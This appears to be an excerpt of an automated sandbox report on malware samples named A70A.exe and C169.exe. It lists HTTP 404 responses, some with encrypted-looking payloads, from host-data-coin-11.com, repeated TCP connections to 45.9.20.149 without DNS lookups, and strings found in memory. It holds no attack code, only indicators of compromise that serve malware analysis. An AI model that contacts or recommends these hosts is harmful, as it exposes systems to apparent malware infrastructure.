                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c3 55 a1 b9 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%XQAc}yc0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 4a ed ac 8e 70 bc 57 da 4a d6 f7 22 81 20 ea c3 96 53 28 ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9JpWJ" S(c0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:04:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef a8 8d 70 bc 57 da 4a d5 fe 24 85 21 ed c3 95 53 2f e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9KpWJ$!S/c0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 01 Dec 2021 09:05:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: unknownTCP traffic detected without corresponding DNS query: 45.9.20.149
                        Source: A70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=485425442358926&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: Bm9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
